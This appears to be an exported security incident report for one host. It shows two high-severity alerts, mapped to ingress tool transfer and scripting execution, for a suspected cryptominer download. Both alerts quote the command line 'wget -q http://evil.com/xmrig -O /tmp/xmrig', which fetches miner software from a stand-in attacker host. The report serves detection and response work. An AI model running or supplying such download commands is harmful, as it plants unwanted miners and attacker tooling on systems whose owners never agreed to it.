Incident Overview

Incident ID CINC-20251220-90E1CB0C
Severity Medium (70)
Status new
Alert Count 2
Host Count 1

Timeline

First Seen 2025-12-20 22:08:37
Last Seen 2025-12-20 22:08:37
Duration 0d 0h 0m
Created 2025-12-20 23:35
Updated 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics: Command and Control, Execution
Techniques: Ingress Tool Transfer, Command and Scripting Interpreter

Affected Hosts (1)

in-bridge-40

Related Alerts (2)

Alert 1
Severity High
Status new
Hostname in-bridge-40
Description An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.
Tactic Command and Control
Command Line wget -q http://evil.com/xmrig -O /tmp/xmrig
Time 12-20 22:08

Alert 2
Severity High
Status new
Hostname in-bridge-40
Description A script launched with a command line that is often associated with Cryptomining software. If this is unexpected, review the process tree.
Tactic Execution
Command Line wget -q http://evil.com/xmrig -O /tmp/xmrig
Time 12-20 22:08